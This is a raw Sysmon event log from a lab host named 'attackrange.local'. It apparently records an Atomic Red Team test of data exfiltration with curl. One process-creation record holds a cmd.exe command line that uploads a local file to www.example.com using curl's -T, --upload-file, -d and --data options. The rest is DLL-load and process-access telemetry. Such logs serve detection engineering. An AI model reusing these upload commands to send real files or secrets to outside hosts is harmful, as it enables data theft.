(rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055301680Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055301679Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.068{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055301678Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.066{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055301677Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.065{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055301676Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.065{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055301675Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.065{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055301674Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.064{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055301673Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.064{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055301672Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.064{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055301671Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.064{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055301670Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.063{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055301669Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.063{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055301668Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.062{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055301667Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.062{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055301666Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.062{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055301665Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055301664Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055301663Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055301662Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 10341000x800000000000000055301661Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-887D-6164-2700-00000000F101}28562088C:\Windows\sysmon64.exe{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1938c|C:\Windows\sysmon64.exe+11484|C:\Windows\sysmon64.exe+b0591|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055301660Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000055301659Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 10341000x800000000000000055301657Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055301656Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E695-618B-D0A5-04000000F101}74967716C:\Windows\system32\cmd.exe{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000055301655Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.055{8B6011A9-E696-618B-D2A5-04000000F101}8232C:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\Curl.exe --upload-file c:\temp\atomictestfile.txt www.example.com C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528{8B6011A9-E695-618B-D0A5-04000000F101}7496C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo "This is an Atomic Test File" c:\temp\atomictestfile.txt & C:\Windows\System32\Curl.exe -T c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --upload-file c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe -d c:\temp\atomictestfile.txt www.example.com & C:\Windows\System32\Curl.exe --data c:\temp\atomictestfile.txt www.example.com" 534500x800000000000000055301654Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exe 734700x800000000000000055301653Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000055301652Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000055301651Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.046{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000055301650Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000055301649Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000055301648Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000055301647Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000055301646Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000055301645Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000055301644Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000055301643Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\msasn1.dll10.0.14393.0 (rs1_release.160715-1616)ASN.1 Runtime APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationmsasn1.dllMD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242trueMicrosoft WindowsValid 734700x800000000000000055301642Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000055301641Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\crypt32.dll10.0.14393.4350 (rs1_release.210407-2154)Crypto API32Microsoft® Windows® Operating SystemMicrosoft CorporationCRYPT32.DLLMD5=95BA70CFA8087A209500D7D350BF3A59,SHA256=4265157E8DC2A0E32A6328D54181CC31FD24E3017E60B270623C2CDBE5FAB4FAtrueMicrosoft WindowsValid 734700x800000000000000055301640Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000055301639Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000055301638Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000055301637Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000055301636Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000055301635Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-887D-6164-2700-00000000F101}28562088C:\Windows\sysmon64.exe{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\sysmon64.exe+14ced|C:\Windows\sysmon64.exe+15adb|C:\Windows\sysmon64.exe+16c29|C:\Windows\sysmon64.exe+1938c|C:\Windows\sysmon64.exe+11484|C:\Windows\sysmon64.exe+b0591|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000055301634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000055301633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000055301632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000055301631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeC:\Windows\System32\Curl.exe7.79.1The curl executableThe curl executablecurl, https://curl.se/curl.exeMD5=46A8FE9CE08112D542220E850323D334,SHA256=7F43DE7FB365D85CF8FEE0EC66D43B09FB3D559B02A432E5925E3748BC3BD528false-Unavailable 25542500x800000000000000055301630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exeImage is replaced 10341000x800000000000000055301619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 15:34:46.031{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-E696-618B-D1A5-04000000F101}1200C:\Windows\System32\Curl.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000055301606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-10 